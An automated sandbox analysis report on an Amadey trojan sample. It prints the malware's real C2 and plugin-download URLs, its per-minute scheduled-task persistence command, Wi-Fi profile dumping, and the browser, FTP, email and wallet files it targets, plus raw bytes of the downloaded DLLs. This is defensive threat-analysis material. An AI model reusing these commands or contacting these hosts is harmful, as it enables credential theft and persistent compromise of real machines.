Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 7, 2024, 9:58 a.m.	Aug. 7, 2024, 10:01 a.m.

Size	260.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`107c3b33e05d1d569cccc2052e56055e`
SHA256	`6338b823d5172f0321814534c1d7aff08a60132c62de48c2752c2c7dfc191228`
CRC32	`B09810CA`
ssdeep	`6144:og7RU92ushCQjrnlNTnbWRp1MHuqbMlAOxyYizl7:mTshCQjrnlluMHuqberyT7`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

amadey.exe "C:\Users\test22\AppData\Local\Temp\amadey.exe"
1044
- Utsysc.exe "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe"
  2184
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F
    2280
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\110809d565579c\cred64.dll, Main
    2708
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\110809d565579c\cred64.dll, Main
      2752
      - netsh.exe netsh wlan show profiles
        2804
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\110809d565579c\clip64.dll, Main
    2928
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
110.42.3.95	Active	Moloch
116.202.81.93	Active	Moloch
118.25.101.87	Active	Moloch
119.176.96.94	Active	Moloch
125.229.77.252	Active	Moloch
146.148.25.153	Active	Moloch
155.159.241.238	Active	Moloch
157.97.109.159	Active	Moloch
162.0.211.158	Active	Moloch
162.240.68.86	Active	Moloch
178.17.168.102	Active	Moloch
182.92.155.50	Active	Moloch
184.154.46.96	Active	Moloch
80.66.75.214	Active	Moloch
197.234.223.180	Active	Moloch
213.100.160.101	Active	Moloch
213.199.32.146	Active	Moloch
34.43.67.154	Active	Moloch
37.16.7.184	Active	Moloch
38.249.14.69	Active	Moloch
38.249.8.144	Active	Moloch
47.99.144.17	Active	Moloch
63.134.234.92	Active	Moloch
68.183.179.133	Active	Moloch
77.246.158.216	Active	Moloch
79.124.17.242	Active	Moloch
79.96.222.94	Active	Moloch
83.243.47.17	Active	Moloch
87.230.85.251	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 155.159.241.238:21 -> 192.168.56.103:57971	2400024	ET DROP Spamhaus DROP Listed Traffic Inbound group 25	Misc Attack
TCP 192.168.56.103:49166 -> 80.66.75.214:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.103:49166 -> 80.66.75.214:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 80.66.75.214:80 -> 192.168.56.103:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 80.66.75.214:80 -> 192.168.56.103:49166	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 80.66.75.214:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 7, 2024, 9:58 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 7, 2024, 9:51 a.m.			0	0
IsDebuggerPresent Aug. 7, 2024, 9:58 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Aug. 7, 2024, 9:58 a.m.	buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 7, 2024, 9:58 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://80.66.75.214/g8djmsaxA/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://80.66.75.214/g8djmsaxA/index.php?scr=1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.66.75.214/g8djmsaxA/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.66.75.214/g8djmsaxA/Plugins/clip64.dll

Performs some HTTP requests (4 events)

request	POST http://80.66.75.214/g8djmsaxA/index.php
request	POST http://80.66.75.214/g8djmsaxA/index.php?scr=1
request	GET http://80.66.75.214/g8djmsaxA/Plugins/cred64.dll
request	GET http://80.66.75.214/g8djmsaxA/Plugins/clip64.dll

Sends data using the HTTP POST Method (2 events)

request	POST http://80.66.75.214/g8djmsaxA/index.php
request	POST http://80.66.75.214/g8djmsaxA/index.php?scr=1

Allocates read-write-execute memory (usually to unpack itself) (10 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2024, 9:51 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73432000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75931000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76e01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x752e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x746b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73441000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 7, 2024, 9:58 a.m.	process_identifier: 2928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f71000 process_handle: 0xffffffff	1

Steals private information from local Internet browsers (5 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file	C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\110809d565579c\clip64.dll
file	C:\Users\test22\AppData\Roaming\110809d565579c\cred64.dll

Creates a suspicious process (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\110809d565579c\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 7, 2024, 9:58 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe	1	1
ShellExecuteExW Aug. 7, 2024, 9:58 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Aug. 7, 2024, 9:58 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\110809d565579c\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Aug. 7, 2024, 9:58 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\110809d565579c\clip64.dll, Main filepath: rundll32.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (11 events)

Time & API	Arguments	Status	Return
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: taskhost.exe process_identifier: 804	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: cmd.exe process_identifier: 300	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: SearchProtocolHost.exe process_identifier: 316	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: SearchFilterHost.exe process_identifier: 108	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: Utsysc.exe process_identifier: 2184	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: svchost.exe process_identifier: 2528	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: mscorsvw.exe process_identifier: 2556	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: mscorsvw.exe process_identifier: 2600	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: sppsvc.exe process_identifier: 2648	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: rundll32.exe process_identifier: 2708	1	1
Process32NextW Aug. 7, 2024, 9:51 a.m.	snapshot_handle: 0x0000000000000128 process_name: rundll32.exe process_identifier: 2752	1	1

An executable file was downloaded by the process utsysc.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 7, 2024, 9:58 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $1óM#u#pu#pu#p.ú'qg#p.ú q~#p.ú&qÅ#p ÿ&q3#p ÿ'qz#p ÿ q\|#p.ú"qx#pu"p´#pîüqq#pîü#qt#pîüÜpt#pîü!qt#pRichu#pPEdÂ¶veð" \H±À` !Xx!øÐ¬ àÀ7p08pè.textøZ\ `.rdataâÅpÆ`@@.dataL@B&@À.pdata¬Ð®h@@_RDATA@@.rsrcø@@.relocà @BHì(A¸ HgH à[èËH $HÄ(é¯ÌÌÌHì(A¸ H_H pbèSËH L$HÄ(éÌÌÌHì(A¸HSH @cè#ËH $HÄ(éOÌÌÌHì(A¸ H/H Ð\èóÊH Ì$HÄ(éÌÌÌHì(A¸H'H aèÃÊH %HÄ(éïÌÌÌHì(A¸HH 0ZèÊH L%HÄ(é¿ÌÌÌHì(E3ÀHoH #bèfÊH %HÄ(éÌÌÌÌÌÌHì(E3ÀHRoH bè6ÊH Ï%HÄ(ébÌÌÌÌÌÌHì(E3ÀH"oH \èÊH &HÄ(é2ÌÌÌÌÌÌHì(E3ÀHònH óXèÖÉH O&HÄ(éÌÌÌÌÌÌHì(A¸H? H ÀYè£ÉH &HÄ(éÏÌÌÌHì(A¸H H eèsÉH Ì&HÄ(éÌÌÌHì(A¸HÿH À`èCÉH 'HÄ(éoÌÌÌHì(A¸HßH pWèÉH L'HÄ(é?ÌÌÌHì(A¸H¿H `ZèãÈH 'HÄ(éÌÌÌHì(A¸H¯H ]è³ÈH Ì'HÄ(éßÌÌÌHì(A¸HH ]èÈH (HÄ(é¯ÌÌÌHì(A¸HkH 0[èSÈH L(HÄ(éÌÌÌHì(A¸HGH `\è#ÈH (HÄ(éOÌÌÌHì(A¸H/H °^èóÇH Ì(HÄ(éÌÌÌHì(A¸HH `_èÃÇH )HÄ(éïÌÌÌHì(A¸LHïH ZèÇH L)HÄ(é¿ÌÌÌHì(A¸HH `VècÇH )HÄ(éÌÌÌHì(A¸dHÿH pbè3ÇH Ì)HÄ(é_ÌÌÌHì(A¸H7H _èÇH HÄ(é/ÌÌÌHì(A¸HH ð\èÓÆH LHÄ(éÿÌÌÌHì(A¸HH àUè£ÆH HÄ(éÏÌÌÌHì(A¸HïH °]èsÆH Ì*HÄ(éÌÌÌHì(A¸(HÏH \èCÆH +HÄ(éoÌÌÌHì(A¸HÏH Ð_èÆH L+HÄ(é?ÌÌÌHì(A¸H¯H bèãÅH +HÄ(éÌÌÌHì(A¸HH ]è³ÅH Ì+HÄ(éßÌÌÌHì(A¸HoH _èÅH ,HÄ(é¯ÌÌÌHì(A¸H_H YèSÅH L,HÄ(éÌÌÌHì(A¸,H?H @Zè#ÅH ,HÄ(éOÌÌÌHì(A¸H?H ÐXèóÄH Ì,HÄ(éÌÌÌHì(A¸H/H ]èÃÄH -HÄ(éïÌÌÌHì(A¸$HH Ð^èÄH L-HÄ(é¿ÌÌÌHì(A¸HH @ZècÄH -HÄ(éÌÌÌHì(A¸Hï H pRè3ÄH Ì-HÄ(é_ÌÌÌHì(A¸Hß H ZèÄH .HÄ(é/ÌÌÌHì(A¸HÏ H VèÓÃH L.HÄ(éÿÌÌÌHì(A¸ H¯ H [è£ÃH .HÄ(éÏÌÌÌHì(A¸ H§ H 0XèsÃH Ì.HÄ(éÌÌÌHì(A¸H? H àSèCÃH /HÄ(éoÌÌÌHì(A¸Ho H 0WèÃH L/HÄ(é?ÌÌÌHì(A¸HW H SèãÂH /HÄ(éÌÌÌHì(A¸H7 H P]è³ÂH Ì/HÄ(éßÌÌÌHì(A¸LHßH ÀWèÂH 0HÄ(é¯ÌÌÌHì(A¸Hç H ÐWèSÂH L0HÄ(éÌÌÌHì(A¸dHïH Xè#ÂH 0HÄ(éOÌÌÌHì(A¸H H P]èóÁH Ì0HÄ(éÌÌÌHì(A¸H H À[èÃÁH 1HÄ(éïÌÌÌHì(A¸Hg H WèÁH L1HÄ(é¿ÌÌÌHì(A¸HG H SècÁH 1HÄ(éÌÌÌHì(A¸H H p]è3ÁH Ì1HÄ(é_ÌÌÌHì(A¸H÷H VèÁH 2HÄ(é/ÌÌÌHì(A¸HÏH pTèÓÀH L2HÄ(éÿÌÌÌHì(A¸H¯H ÀQè£ÀH 2HÄ(éÏÌÌÌHì(A¸HH NèsÀH Ì2HÄ(éÌÌÌHì(A¸HH @WèCÀH 3HÄ(éoÌÌÌHì(A¸0H_H Ð[èÀH L3HÄ(é?ÌÌÌHì(A¸HgH À[èã¿H 3HÄ(éÌÌÌHì(A¸HGH p\è³¿H Ì3HÄ(éßÌÌÌ request_handle: 0x00cc000c	1	1	0
InternetReadFile Aug. 7, 2024, 9:58 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELÄ¶veà!!g à@ z<{P°øÀ°o8èo@ H.textV `.rdata b d@@.datav@À.rsrcø°@@.relocÀ@Bj hèl¹pèßHhèSYÃÌÌÌj hm¹è¿Hh`èSYÃÌÌÌjh0m¹ èHhÀèmSYÃÌÌÌjhDm¹¸èHh èMSYÃÌÌÌjham¹Ðè_Hhè-SYÃÌÌÌjham¹èè?Hhàè SYÃÌÌÌjham¹èHh@èíRYÃÌÌÌjham¹èÿGh èÍRYÃÌÌÌhè¾RYÃÌÌÌÌh`è®RYÃÌÌÌÌhÀèRYÃÌÌÌÌj?hèm¹xè¯Gh è}RYÃÌÌÌhènRYÃÌÌÌÌh è^RYÃÌÌÌÌh@èNRYÃÌÌÌÌhàè>RYÃÌÌÌÌhè.RYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèb[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!Pè[ÄöEtjVèLNÄÆ^]ÂAÇÔ!Pèi[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhzEôPè;[ÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèRZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hdmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèEjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPè§DMüE9MÇE¬BM}QCEMPÇE°ÆEèvD}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè«jMÄ3uÀÄÆëÆE¼Mäÿu¼SèG}E°ør+HÇùrüÁ#+ÇÀüøQWèXKÄUúr,MBÁúrIüÂ#+ÁÀüødRQè$KÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQèJEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèDJÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèþIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQè¸IÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhamÇCÇCÆèÝAUúr(MBÁúrIüÂ#+ÁÀüøwbRQè"IÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèÓHÄ_^Ã[å]ÃèðnÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVham3ÛèAÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèÆAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèµGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèBGÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQèGÄÿtuøéoþÿÿ_^[å]ÃèmÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèÞ>Eà×PMÈè@ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè FÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQè§EÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèeEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃènkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè=}EÿuCE¹0Pè=5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc000c	1	1	0

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F
cmdline	netsh wlan show profiles
cmdline	"C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F
cmdline	C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe

Communicates with host for which no DNS query was performed (29 events)

host	110.42.3.95
host	116.202.81.93
host	118.25.101.87
host	119.176.96.94
host	125.229.77.252
host	146.148.25.153
host	155.159.241.238
host	157.97.109.159
host	162.0.211.158
host	162.240.68.86
host	178.17.168.102
host	182.92.155.50
host	184.154.46.96
host	80.66.75.214
host	197.234.223.180
host	213.100.160.101
host	213.199.32.146
host	34.43.67.154
host	37.16.7.184
host	38.249.14.69
host	38.249.8.144
host	47.99.144.17
host	63.134.234.92
host	68.183.179.133
host	77.246.158.216
host	79.124.17.242
host	79.96.222.94
host	83.243.47.17
host	87.230.85.251

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\466504e025\Utsysc.exe" /F

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (15 events)

file	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.purple\accounts.xml
file	C:\Windows\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\466504e025\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file	C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml

Harvests credentials from local email clients (2 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Amadey.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Downloader.dh
ALYac	Gen:Variant.Zusy.446510
Cylance	Unsafe
VIPRE	Gen:Variant.Zusy.446510
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005a7a4a1 )
Alibaba	TrojanDownloader:Win32/Amadey.b6d38fe6
K7GW	Trojan ( 005a7a4a1 )
Cybereason	malicious.3e05d1
Arcabit	Trojan.Zusy.D6D02E
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
APEX	Malicious
McAfee	Downloader-FCND!107C3B33E05D
Paloalto	generic.ml
ClamAV	Win.Downloader.Amadey-10017867-0
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Variant.Zusy.446510
MicroWorld-eScan	Gen:Variant.Zusy.446510
Rising	Downloader.Amadey!8.125AC (CLOUD)
Emsisoft	Gen:Variant.Zusy.446510 (B)
F-Secure	Trojan:W32/Amadey.A
McAfeeD	ti!6338B823D517
Trapmine	suspicious.low.ml.score
FireEye	Generic.mg.107c3b33e05d1d56
Sophos	Mal/Amadey-C
SentinelOne	Static AI - Malicious PE
Google	Detected
Avira	HEUR/AGEN.1375090
MAX	malware (ai score=88)
Kingsoft	Win32.Troj.Unknown.a
Gridinsoft	Trojan.Amadey.65344.dd!yf
Microsoft	Trojan:Win32/Amadey!pz
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Win32.Trojan-Downloader.Amadey.D
Varist	W32/Amadey.C1.gen!Eldorado
AhnLab-V3	Malware/Win.Trojanspy.C5238800
BitDefenderTheta	Gen:NN.ZexaF.36810.quW@aymJhBgi
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Ikarus	Trojan-Downloader.Win32.Amadey
TrendMicro-HouseCall	TROJ_GEN.R002C0DH624
Tencent	Win32.Trojan.Agen.Pgil
huorong	TrojanDownloader/Amadey.p
Fortinet	W32/Amadey.A!tr
Panda	Trj/Genetic.gen

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (12 events)

dead_host	192.168.56.103:57971
dead_host	192.168.56.103:57959
dead_host	192.168.56.103:57117
dead_host	192.168.56.103:57734
dead_host	192.168.56.103:57949
dead_host	192.168.56.103:57955
dead_host	192.168.56.103:57972
dead_host	192.168.56.103:57721
dead_host	192.168.56.103:57966
dead_host	192.168.56.103:57942
dead_host	192.168.56.103:57806
dead_host	192.168.56.103:57103

amadey.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All